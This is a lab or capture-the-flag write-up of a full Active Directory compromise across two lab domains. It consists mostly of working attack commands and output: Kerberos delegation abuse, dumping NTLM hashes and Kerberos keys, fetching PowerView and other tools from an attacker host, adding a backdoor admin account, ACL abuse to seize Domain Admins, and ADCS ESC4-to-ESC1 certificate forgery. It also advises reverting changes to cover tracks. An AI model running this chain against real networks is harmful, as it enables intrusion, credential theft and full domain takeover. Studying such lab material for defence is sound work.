[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Changing service from eventlog/share@ACADEMY.NINJA.LAN to cifs/share@ACADEMY.NINJA.LAN
[*] Saving ticket in Administrator@cifs_share@ACADEMY.NINJA.LAN.ccache

 

.

when error : Impersonating Administrator [*] Requesting S4U2self [-] Kerberos SessionError: KDC_ERR_ETYPE_NOSUPP(KDC has no support for encryption type)

Kerberos relies heavily on time synchronization. If the local clock on your attacking machine differs by more than 5 minutes from the Domain Controller’s clock, pre-authentication will fail.
  • Solution: Sync your attack box clock with the target Domain Controller using ntpdate or rdate:
    bash
    sudo ntpdate <DC_IP>

and now I am able to get access to the share machine as Administrator.

KRB5CCNAME=administrator@cifs_share@ACADEMY.NINJA.LAN.ccache

impacket-smbexec share -k -no-pass

┌──(bolke㉿kali)-[~]
└─$ impacket-smbexec share -k -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
share

C:\Windows\system32>

.

impacket-secretsdump @share -k -no-pass -target-ip 192.168.56.23
evil-winrm -i share -u ".\Administrator" -H "7849822ea2995bac91cc0a20c6af1fbe"
impacket-smbexec administrator@share -hashes :7849822ea2995bac91cc0a20c6af1fbe

While dumping the hashes from SHARE to get the machine account hash, I also encounter the password of Frank’s account. Which is Il0ve!R4men_<3 .

$ impacket-smbexec share -k -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>dir c:\
C:\Windows\system32>type c:\bot.ps1
$pass=ConvertTo-SecureString 'Il0ve!R4men_<3' -AsPlainText -Force;
$creds=New-Object System.Management.Automation.PSCredential ('academy.ninja.lan\frank', $pass);
Invoke-Command -Computername web.academy.ninja.lan -ScriptBlock {sleep 55} -Authentication 'Credssp' -Credential $creds
C:\Windows\system32>

 

GMSANFS$@ACADEMY.NINJA.LAN is a Group Managed Service Account. The computer SHARE.ACADEMY.NINJA.LAN can retrieve the password for the GMSA GMSANFS$@ACADEMY.NINJA.LAN.

so i used GMSAPasswordReader.exe as nt authority system

impacket-getST -spn 'eventlog/share' -altservice 'cifs' -impersonate 'Administrator' -aesKey a0d676dd3e4d7673ec255caf010e1e350f1b09d8871b88eb01c4c8ba4217beac 'academy.ninja.lan/frank'
export KRB5CCNAME=Administrator@cifs_share@ACADEMY.NINJA.LAN.ccache
klist

impacket-smbexec share -k -no-pass
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>curl https://192.168.56.1/GMSAPasswordReader.exe -o c:\programdata\gmsapasswordreader.exe
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  103k  100  103k    0     0   847k      0 --:--:-- --:--:-- --:--:--  895k

C:\Windows\system32>c:\programdata\gmsapasswordreader.exe --accountname GMSANFS$
Calculating hashes for Current Value
[*] Input username             : gmsaNFS$
[*] Input domain               : ACADEMY.NINJA.LAN
[*] Salt                       : ACADEMY.NINJA.LANgmsaNFS$
[*]       rc4_hmac             : 5921F691522FD2C2B78ACDF1FD3F9555
[*]       aes128_cts_hmac_sha1 : 6DC9BFC834FC8B601CF08F6D9A18B922
[*]       aes256_cts_hmac_sha1 : CEC6190E5DEECFFB79FFD45BEEFE317BC56C497B12424CF5E4E8AE90CF70EF46
[*]       des_cbc_md5          : D6542F8C8CB5ECA8


C:\Windows\system32>

.

Verify creds : nxc smb 192.168.56.10-23 -u “gmsaNFS$” -H “5921F691522FD2C2B78ACDF1FD3F9555”

nxc smb 192.168.56.10-23 -u "gmsaNFS$" -H "5921F691522FD2C2B78ACDF1FD3F9555"
SMB         192.168.56.10   445    DC-VIL           [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-VIL) (domain:ninja.hack) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.10   445    DC-VIL           [-] ninja.hack\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555 STATUS_LOGON_FAILURE
SMB         192.168.56.20   445    DC-AC            [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-AC) (domain:academy.ninja.lan) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.22   445    SQL              [*] Windows 10 / Server 2019 Build 17763 x64 (name:SQL) (domain:academy.ninja.lan) (signing:False) (SMBv1:None)
SMB         192.168.56.21   445    WEB              [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB) (domain:academy.ninja.lan) (signing:False) (SMBv1:None)
SMB         192.168.56.23   445    SHARE            [*] Windows 10 / Server 2019 Build 17763 x64 (name:SHARE) (domain:academy.ninja.lan) (signing:False) (SMBv1:None)
SMB         192.168.56.20   445    DC-AC            [+] academy.ninja.lan\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555
SMB         192.168.56.22   445    SQL              [+] academy.ninja.lan\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555
SMB         192.168.56.21   445    WEB              [+] academy.ninja.lan\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555
SMB         192.168.56.23   445    SHARE            [+] academy.ninja.lan\gmsaNFS$:5921F691522FD2C2B78ACDF1FD3F9555
Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

.


next  on share server I

net user puck Password123@ /add"

net localgroup administrators /add puck

net localgroup administrators /add frank

Then RDPéd in to share as Frank and started an Admin prompt

C:\ProgramData>Rubeus233.exe asktgt /domain:academy /user:GMSANFS$ /rc4:5921F691522FD2C2B78ACDF1FD3F9555 /pth /nowrap

C:\ProgramData>Rubeus233.exe asktgt /domain:academy /user:GMSANFS$ /rc4:5921F691522FD2C2B78ACDF1FD3F9555 /pth /nowrap

Rubeus.exe ptt /ticket:<BASE64_TICKET> 

klist

…

 

Having a look in BloodHound we can see that the machine gmsaNFS$ has an ACL ForceChangePassword over the backup user. We can use PowerView to do this.

IEX(New-Object Net.WebClient).downloadString('http://192.168.56.1/PowerView.ps1')

$NewPassword = ConvertTo-SecureString 'Password123@' -AsPlainText -Force
Set-DomainUserPassword -Identity 'backup' -AccountPassword $NewPassword

After this, we confirm it using netexec

netexec smb 192.168.58.20 -u backup -p 'Password123@'

Flag captured

Attacking DC-AC (Academy Domain Controller)

Found a Group Managed Service Account: GMSANFS$

It had ForceChangePassword on backup user

Used pth-net rpc to change backup‘s password and logged in.

Found that backup had:WriteOwner on “Domain Admins”

pth-net rpc password “backup” “Password123@” -U “academy.ninja.lan”/”gmsaNFS$”%”ffffffffffffffffffffffffffffffff”:”5921F691522FD2C2B78ACDF1FD3F9555″ -S “192.168.56.20”

$ pth-net rpc password "backup" "Password123@" -U "academy.ninja.lan"/"gmsaNFS$"%"ffffffffffffffffffffffffffffffff":"5921F691522FD2C2B78ACDF1FD3F9555" -S "192.168.56.20"
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

verify creds : nxc smb 192.168.56.20 -u “backup” -p “Password123@”

$ nxc smb 192.168.56.20 -u "backup" -p "Password123@"
SMB         192.168.56.20   445    DC-AC            [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-AC) (domain:academy.ninja.lan) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.20   445    DC-AC            [+] academy.ninja.lan\backup:Password123@

so now i can add user backup to domains admins groups

net rpc group addmem “Domain admins” “backup” -U “academy.ninja.lan”/”backup”%”P@ssw0rd123!” -S “192.168.56.20”

Could not add backup to Domain admins: NT_STATUS_ACCESS_DENIED

got error

so i accessed to backup account via rdp using runas from SHARE Computer

runas /user:academy.ninja.lan\backup cmd
PS C:\tmp> . .\PowerView.ps1
PS C:\tmp> Set-DomainObjectOwner -Identity “Domain Admins” -OwnerIdentity “ACADEMY\backup”
net rpc group addmem “Domain admins” “backup” -U “academy.ninja.lan”/”backup”%”P@ssw0rd123!” -S “192.168.56.20”

no error showed so its succeed

netexec smb 192.168.56.20 -u ‘backup’ -p ‘P@ssw0rd123!’
SMB 192.168.56.20 445 DC-AC [+] academy.ninja.lan\backup:P@ssw0rd123! (Pwn3d!)

Got Domain Admin
Grabbed the flag from DC-AC.

.

or use : impacket-owneredit -action read -target ‘Domain Admins’ academy.ninja.lan/backup:’Password123@’

$ impacket-owneredit -action read -target 'Domain Admins' academy.ninja.lan/backup:'Password123@'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-1689894000-2828720023-2655755433-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=academy,DC=ninja,DC=lan

.

We can use this to change the owner of the Domain Admins group to backup as well.

then : impacket-owneredit -action write -new-owner ‘backup’ -target ‘Domain Admins’ academy.ninja.lan/backup:’Password123@’

$ impacket-owneredit -action write -new-owner 'backup' -target 'Domain Admins' academy.ninja.lan/backup:'Password123@'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Current owner information below
[*] - SID: S-1-5-21-1689894000-2828720023-2655755433-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=academy,DC=ninja,DC=lan
[*] OwnerSid modified successfully!

.

Once that is done we can easily update the user backup to have GenericAll privileges over the Domain Admins group using dacledit.py.

thus then : impacket-dacledit -action ‘write’ -rights ‘FullControl’ -principal backup -target ‘Domain Admins’ ‘academy.ninja.lan’/’backup’:’Password123@’

$ impacket-dacledit -action 'write' -rights 'FullControl' -principal backup  -target 'Domain Admins' 'academy.ninja.lan'/'backup':'Password123@'
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20260909-123930.bak
[*] DACL modified successfully!

This can again be confirmed using BloodHound dump.

bloodhound-python -c all -d academy.ninja.lan -v -u backup -p 'Password123@' -ns 192.168.56.20 --zip

 

Once that is confirmed, the only thing remaining is really just adding ourselves in the Domain Admins group.

thus then : net rpc group addmem 'Domain Admins' backup -U academy.ninja.lan/backup -S 192.168.56.20
$  net rpc group addmem 'Domain Admins' backup -U academy.ninja.lan/backup -S 192.168.56.20
Password for [ACADEMY.NINJA.LAN\backup]: Password123@

With all this out of the way, we can finally dump the domain secrets using secretsdump.py and pwn the whole domain.

thus  : impacket-secretsdump ‘academy.ninja.lan’/’backup’:’Password123@’@192.168.56.20 -dc-ip 192.168.56.20 -outputfile nha-domain1.txt

$ impacket-secretsdump 'academy.ninja.lan'/'backup':'Password123@'@192.168.56.20 -dc-ip 192.168.56.20 -outputfile nha-domain1.txt
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x7ad9a178f153c71e79df54bc4542a543
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8fd12ffe951b45af5bea2bd921accba4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6b5b5071de731b4a048a38e0642ffb33:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:85a647f698d2dcb50ee92ccabee39061:::
vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
alice:1115:aad3b435b51404eeaad3b435b51404ee:fcc5006e4079986d1e462efaa05e14fe:::
<snip>
[*] Kerberos keys grabbed
alice:aes256-cts-hmac-sha1-96:0243e09e78c5117a62a869997143fba060fe39add6254e57598a0024c7d4869a
alice:aes128-cts-hmac-sha1-96:0ab4ec8a6093b60aa5d0786928cdeb56
alice:des-cbc-md5:625837132ab38cb9
<snip>

.

So 1st academy domain now pwned

thus  : evil-winrm -i 192.168.56.20 -u “alice” -H “fcc5006e4079986d1e462efaa05e14fe”

$ evil-winrm -i 192.168.56.20 -u "alice" -H "fcc5006e4079986d1e462efaa05e14fe"

*Evil-WinRM* PS C:\Users\alice\Documents> whoami
academy\alice

 

.


.

Final Win — DC-VIL (ninja.hack)

After fully compromising the academy.ninja.lan domain, it was time to go after the second one — ninja.hack, hosted on 192.168.56.10.

use  : evil-winrm -i 192.168.56.20 -u “backup” -p “Password123@”
Since the command Get-NetUser -Domain ninja.hack works fine over RDP but fails over Evil-WinRM, the issue is caused by the WinRM Double-Hop Problem ( The error message Exception calling "FindAll" with "0" argument(s): "An operations error occurred" when running Get-NetUser (a PowerView cmdlet) ).
When you authenticate via Evil-WinRM, you are given a network logon token. Windows security policies prevent this token from being reused to authenticate to a secondary network resource—in this case, sending an LDAP request to the Domain Controller—even if the DC is on the same machine. RDP does not have this restriction because it creates a full, interactive local session.
Here is the best ways to bypass this restriction and run your PowerView commands through Evil-WinRM:
1. Pass Credentials Directly in PowerView
The easiest workaround is to explicitly feed credentials into the Get-NetUser cmdlet. This forces PowerView to create a new, authenticated network connection rather than relying on your delegated WinRM token.
powershell
# Create a credential object
$passwd = ConvertTo-SecureString "Password123@" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("academy\backup", $passwd)

# Run the command with explicit credentials
Get-NetUser -Domain ninja.hack -Credential $cred
That’s working.

2.

Domain Trust Enumeration

Using PowerView, I checked if there was any trust between the two domains:

Get-NetDomainTrust

And yes — it’s bidirectional trust
That means I can enumerate and interact with ninja.hack using users from academy.ninja.lanand i can extract the users and use sharphound

Get-NetUser -Domain ninja.hack | Select-Object SamAccountName
.\SharpHound.exe -c all -d ninja.hack
thus  : ./sharphoundce.exe -c all -d ninja.hack --ldapusername backup --ldappassword 'Password123@'

User Discovery with Kerbrute

I ran Kerbrute against both domains to find valid users.

kerbrute userenum -d ninja.hack — dc 192.168.56.10 hack_user
kerbrute userenum -d academy.ninja.lan — dc 192.168.56.20 users

From that, I noticed some users have the same name but different format:

  • alice in academy → alice.johnson in ninja
  • olivia → olivia.davis
  • frank → frank.umino

I decided to try spraying the NTLM hashes I got earlier from academy onto these users.

$ nxc smb 192.168.56.10 -u "olivia.davis" -H "91d85135bb2c4e12c46efbb77612c487"
SMB         192.168.56.10   445    DC-VIL           [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-VIL) (domain:ninja.hack) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.10   445    DC-VIL           [+] ninja.hack\olivia.davis:91d85135bb2c4e12c46efbb77612c487

$ nxc smb 192.168.56.20 -u "olivia" -H "91d85135bb2c4e12c46efbb77612c487"
SMB         192.168.56.20   445    DC-AC            [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-AC) (domain:academy.ninja.lan) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.20   445    DC-AC            [+] academy.ninja.lan\olivia:91d85135bb2c4e12c46efbb77612c487

 

olivia.davis worked! I had valid creds for her in ninja.hack.

Using BloodHound, I discovered that olivia.davis has WriteDACL permissions on rachel.philips.

That means I can give olivia full control over rachel:

Press enter or click to view image in full size

1: impacket-dacledit -action 'read' -principal olivia.davis -target 'rachel.philips' 'ninja.hack'/'olivia.davis' -hashes <rc4hash>'
2: impacket-dacledit -action 'write' -rights 'FullControl' -principal 'olivia.davis' -target 'rachel.philips' 'ninja.hack'/'olivia.davis' -hashes <rc4hash>'

$ impacket-dacledit -action 'read' -principal olivia.davis -target 'rachel.philips' 'ninja.hack'/'olivia.davis' -hashes aad3b435b51404eeaad3b435b51404ee:91d85135bb2c4e12c46efbb77612c487
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Parsing DACL
[*] Printing parsed DACL
[*] Filtering results for SID (S-1-5-21-1377167689-3644946187-504094176-1115)
[*]   ACE[19] info
[*]     ACE Type                  : ACCESS_ALLOWED_ACE
[*]     ACE flags                 : None
[*]     Access mask               : WriteDACL (0x40000)
[*]     Trustee (SID)             : olivia.davis (S-1-5-21-1377167689-3644946187-504094176-1115)


$ impacket-dacledit -action 'write' -rights 'FullControl' -principal 'olivia.davis' -target 'rachel.philips' 'ninja.hack'/'olivia.davis' -hashes aad3b435b51404eeaad3b435b51404ee:91d85135bb2c4e12c46efbb77612c487
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] DACL backed up to dacledit-20260910-102244.bak
[*] DACL modified successfully!

 

Then I reset rachel‘s password using: pth-net rpc password "RACHEL.PHILIPS" "P@ssw0rd123@" ...

$ pth-net rpc password "RACHEL.PHILIPS" "P@ssw0rd123@" -U "ninja.hack/OLIVIA.DAVIS%ffffffffffffffffffffffffffffffff:91d85135bb2c4e12c46efbb77612c487" -S 192.168.56.10
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...

We were able to successfully change the access to FullControl to the user rachel.philips. Now we can change this user’s password to access it. We cant use shadow credentials to get the hash for this user as done here because we get KDC_ERR_PADATA_TYPE_NOSUPP error meaning ther DC is not set for PKINIT authentication. We could also use bloodyAD for it as seen here.

use: bloodyAD –host 192.168.56.10 -d ninja.hack -u olivia.davis -p :91d85135bb2c4e12c46efbb77612c487 set password rachel.philips ‘Password123@’

.

$ bloodyAD --host 192.168.56.10 -d ninja.hack -u olivia.davis -p :91d85135bb2c4e12c46efbb77612c487 set password rachel.philips 'Password123@'
[+] Password changed successfully!

$ nxc smb 192.168.56.10 -u "rachel.philips" -p "Password123@"
SMB         192.168.56.10   445    DC-VIL           [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC-VIL) (domain:ninja.hack) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.56.10   445    DC-VIL           [+] ninja.hack\rachel.philips:Password123@

 

Logged in as rachel.philips successfully

Group Membership + Privilege Escalation

Found out that RACHEL.PHILIPS can be added to the JONIN group because the SANIN group (which she is a part of) has GenericAll over it.

So I did:

use: net rpc group addmem “JONIN” “RACHEL.PHILIPS” -U “NINJA.HACK/RACHEL.PHILIPS%Password123@” -S 192.168.56.10

or use: bloodyAD –host 192.168.56.10 -d ninja.hack -u rachel.philips -p ‘Password123@’ add groupMember jonin rachel.philips

and verify with : ldeep ldap -u rachel.philips -p ‘Password123@’ -d ninja.hack -s ldap://192.168.56.10 membersof ‘JONIN’

$  ldeep ldap -u rachel.philips -p 'Password123@' -d ninja.hack -s ldap://192.168.56.10 membersof 'JONIN'
rachel.philips (user)
uma.johnson (user)
katherine.white (user)
yara.yuhi (user)
david.wilson (user)

or verify with : net rpc group members “JONIN” -U “NINJA.HACK/RACHEL.PHILIPS%Password123@” -S 192.168.56.10

or verify with : net rpc group list -U “NINJA.HACK/RACHEL.PHILIPS%Password123@” -S 192.168.56.100

Still, nothing valuable on BloodHound — so I dug deeper…

nxc smb 192.168.56.10 -u 'RACHEL.PHILIPS' -p 'Password123@' -M enum_ca
nxc ldap 192.168.56.10 -u 'RACHEL.PHILIPS' -p 'Password123@' -M adcs

found cert so i used

use: certipy find -u ‘rachel.philips@ninja.hack’ -p ‘Password123@’ -dc-ip 192.168.56.10 -vulnerable -stdout

Found one! ➜ SignatureValidation

$ certipy find -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip 192.168.56.10 -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
<snip>
Certificate Templates
  0
    Template Name                       : SignatureValidation
    Display Name                        : SignatureValidation
    Certificate Authorities             : NINJA-CA
    Enabled                             : True
    Client Authentication               : False
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireEmail
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : IncludeSymmetricAlgorithms
                                          PendAllRequests
                                          PublishToDs
                                          AutoEnrollment
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Code Signing
    Requires Manager Approval           : True
    Requires Key Archival               : False
    RA Application Policies             : Any Purpose
    Authorized Signatures Required      : 1
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2026-08-18T08:30:54+00:00
    Template Last Modified              : 2026-08-18T08:31:13+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : NINJA.HACK\Domain Users
      Object Control Permissions
        Owner                           : NINJA.HACK\Enterprise Admins
        Full Control Principals         : NINJA.HACK\Domain Admins
                                          NINJA.HACK\Jonin
                                          NINJA.HACK\Local System
                                          NINJA.HACK\Enterprise Admins
        Write Owner Principals          : NINJA.HACK\Domain Admins
                                          NINJA.HACK\Jonin
                                          NINJA.HACK\Local System
                                          NINJA.HACK\Enterprise Admins
        Write Dacl Principals           : NINJA.HACK\Domain Admins
                                          NINJA.HACK\Jonin
                                          NINJA.HACK\Local System
                                          NINJA.HACK\Enterprise Admins
    [+] User Enrollable Principals      : NINJA.HACK\Domain Users
                                          NINJA.HACK\Jonin
    [+] User ACL Principals             : NINJA.HACK\Jonin
    [!] Vulnerabilities
      ESC4                              : User has dangerous permissions.

┌──(bolke㉿kali)-[~]

 

and ESC4 vulnerable

As said by lummelsec on this post, we can use this command to make this certificate vulnerable to ECS1.


Yes, converting ESC4 to ESC1 is the exact intended path. [1, 2]
Since you confirmed your tool version is Certipy v5.0.4, the reason it wasn’t working is due to a breaking syntax change introduced in version 5.0. The old parameter -save-old was replaced. In Certipy v5+, you must use the -write-default-configuration flag to tell the tool to overwrite the template configuration to make it vulnerable to ESC1. [1]
Step-by-Step ESC4 to ESC1 Execution (Certipy v5)
Step 1: Overwrite the Template to Enable ESC1
Run this command using the new v5 flag. This will automatically backup the old settings into a JSON file in your current directory and turn SignatureValidation into an ESC1-vulnerable template: [1]
bash
certipy template -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -template 'SignatureValidation' -write-default-configuration

Step 2: Request the Certificate (The ESC1 Abuse)
Now that the template configuration is modified, use certipy req to exploit the ESC1 state. You can specify a high-privileged User Principal Name (like Administrator) using the -upn flag: [1]
bash
certipy req -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -target '192.168.56.10' -ca 'NINJA-CA' -template 'SignatureValidation' -upn 'Administrator@ninja.hack'

(Note: Replace NINJA-CA with the actual CA Name found earlier in your certipy find text file).

┌──(bolke㉿kali)-[~]
└─$ certipy template -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -template 'SignatureValidation' -write-default-configuration
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Saving current configuration to 'SignatureValidation.json'
[*] Wrote current configuration for 'SignatureValidation' to 'SignatureValidation.json'
[*] Updating certificate template 'SignatureValidation'
[*] Deleting:
[*]     msPKI-RA-Application-Policies: []
[*] Replacing:
[*]     nTSecurityDescriptor: b'\x01\x00\x04\x9c0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x00\x1c\x00\x01\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00\x01\x01\x00\x00\x00\x00\x00\x05\x0b\x00\x00\x00'
[*]     flags: 66104
[*]     pKIDefaultKeySpec: 2
[*]     pKIKeyUsage: b'\x86\x00'
[*]     pKIMaxIssuingDepth: -1
[*]     pKICriticalExtensions: ['2.5.29.19', '2.5.29.15']
[*]     pKIExtendedKeyUsage: ['1.3.6.1.5.5.7.3.2']
[*]     msPKI-RA-Signature: 0
[*]     msPKI-Enrollment-Flag: 0
[*]     msPKI-Private-Key-Flag: 16
[*]     msPKI-Certificate-Name-Flag: 1
[*]     msPKI-Certificate-Application-Policy: ['1.3.6.1.5.5.7.3.2']
Are you sure you want to apply these changes to 'SignatureValidation'? (y/N): y
[*] Successfully updated 'SignatureValidation'

┌──(bolke㉿kali)-[~]
└─$ certipy req -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -target '192.168.56.10' -ca 'NINJA-CA' -template 'SignatureValidation' -upn 'Administrator@ninja.hack'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 3
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@ninja.hack'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

┌──(bolke㉿kali)-[~]

.

Once you have successfully received the administrator .pfx certificate file, immediately revert the template to its original settings to cover your tracks. Certipy v5 does this by reading the generated configuration JSON file: [1, 2]
bash
certipy template -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -template 'SignatureValidation' -write-configuration 'SignatureValidation.json' -no-save
Use code with caution.
.
So now also a esc1 vuln template
┌──(bolke㉿kali)-[~]
└─$ certipy find -u 'rachel.philips@ninja.hack' -p 'Password123@' -dc-ip '192.168.56.10' -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
<snip>
Certificate Templates
  0
    Template Name                       : SignatureValidation
    Display Name                        : SignatureValidation
    Certificate Authorities             : NINJA-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2026-08-18T08:30:54+00:00
    Template Last Modified              : 2026-09-10T09:59:51+00:00
    Permissions
      Object Control Permissions
        Owner                           : NINJA.HACK\Enterprise Admins
        Full Control Principals         : NINJA.HACK\Authenticated Users
        Write Owner Principals          : NINJA.HACK\Authenticated Users
        Write Dacl Principals           : NINJA.HACK\Authenticated Users
    [+] User Enrollable Principals      : NINJA.HACK\Authenticated Users
    [+] User ACL Principals             : NINJA.HACK\Authenticated Users
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
      ESC4                              : User has dangerous permissions.

.


now its shows ESC1–4 i will abuse ESC1

1: certipy req -u ‘rachel.philips@ninja.hack’ -p ‘Password123@’ -ca ‘NINJA-CA’ -template ‘SignatureValidation’ -upn ‘Administrator@ninja.hack’ -target-ip ‘192.168.56.10’

2:certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10

i got error

[-] Object SID mismatch between certificate and user ‘administrator’

┌──(bolke㉿kali)-[~]
└─$ certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator@ninja.hack'
[*] Using principal: 'administrator@ninja.hack'
[*] Trying to get TGT...
[-] Object SID mismatch between certificate and user 'administrator'
[-] See the wiki for more information

 

we need add the sid of user administrator to the req

i got the sid from rpcclient (or get it from bloodhound) : rpcclient -U ‘rachel.philips’ 192.168.56.10 -c ‘lookupnames administrator’

1: certipy req -u ‘rachel.philips@ninja.hack’ -p ‘Password123@’ -ca ‘NINJA-CA’ -template ‘SignatureValidation’ -upn ‘Administrator@ninja.hack’ -target-ip ‘192.168.56.10’ -sid ‘S-1-5-21-1377167689-3644946187-504094176-500”

2: certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10

$ rpcclient -U 'rachel.philips' 192.168.56.10 -c 'lookupnames administrator'
Password for [WORKGROUP\rachel.philips]:
administrator S-1-5-21-1377167689-3644946187-504094176-500 (User: 1)

$ certipy req -u 'rachel.philips@ninja.hack' -p 'Password123@' -ca 'NINJA-CA' -template 'SignatureValidation' -upn 'Administrator@ninja.hack' -target-ip '192.168.56.10' -sid 'S-1-5-21-1377167689-3644946187-504094176-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[!] DNS resolution failed: All nameservers failed to answer the query NINJA.HACK. IN A: Server Do53:1.1.1.2@53 answered [Errno 101] Network is unreachable
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 6
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator@ninja.hack'
[*] Certificate object SID is 'S-1-5-21-1377167689-3644946187-504094176-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename): y
[*] Wrote certificate and private key to 'administrator.pfx'

$ certipy auth -pfx administrator.pfx -dc-ip 192.168.56.10
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator@ninja.hack'
[*]     SAN URL SID: 'S-1-5-21-1377167689-3644946187-504094176-500'
[*]     Security Extension SID: 'S-1-5-21-1377167689-3644946187-504094176-500'
[*] Using principal: 'administrator@ninja.hack'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
